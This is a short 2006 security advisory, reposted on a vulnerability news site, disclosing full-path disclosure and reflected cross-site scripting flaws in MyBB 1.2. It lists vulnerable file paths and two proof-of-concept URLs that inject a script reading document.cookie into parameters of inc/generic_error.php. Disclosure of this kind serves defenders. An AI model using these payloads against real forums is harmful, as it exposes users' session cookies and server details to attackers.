Computer Security

Security Advisory: MyBB 1.2 Full path and Cross site scripting vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BizDirectory all version xss

  PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability

  Sql injection in Moodle

  Q-Shop v3.5(browse.
asp) Remote SQL Injection Vulnerability

From:HACKERS PAL <security_(at)_soqor.net>
Date:19.09.2006
Subject:MyBB 1.2 Full path and Cross site scripting vulnerabilities

Hello

Title : MyBB 1.2 Full path and Cross site scripting vulnerabilities
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@soqor.net

Full path
inc/generic_error.php?message=1
inc/datahandlers/event.php
inc/datahandlers/pm.php
inc/datahandlers/post.php
inc/datahandlers/user.php

Full path and Xss
inc/generic_error.php?message=<script>alert(document.
cookie);</script>
inc/generic_error.php?message=1&code=<script>alert(document.
cookie);</script>

WwW.SoQoR.NeT
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server